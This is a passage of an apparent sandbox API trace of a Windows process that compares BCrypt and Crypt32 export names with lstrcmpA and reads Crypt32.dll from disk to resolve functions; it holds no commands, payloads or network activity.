(lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0277.573] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0277.574] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0277.575] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0277.578] GetProcessHeap () returned 0x470000 [0277.578] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2d02010 | out: hHeap=0x470000) returned 1 [0277.578] GetProcessHeap () returned 0x470000 [0277.578] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489080 [0277.578] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0277.586] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0277.586] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0277.587] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0277.587] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0277.587] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0277.587] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0277.587] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0277.588] GetProcessHeap () returned 0x470000 [0277.588] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30e0) returned 0x40c4040 [0277.592] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0277.592] ReadFile (in: hFile=0x160, lpBuffer=0x40c4040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c4040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0277.708] CloseHandle (hObject=0x160) returned 1 [0277.709] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0277.709] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.709] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0277.709] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.709] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.709] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0277.709] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.709] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.709] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0277.709] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0277.709] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0277.709] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0277.710] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0277.710] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.710] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.711] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.712] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.713] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.714] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.714] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0277.714] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0277.714] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0277.715] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0277.715] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0277.716] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.716] lstrcmpA 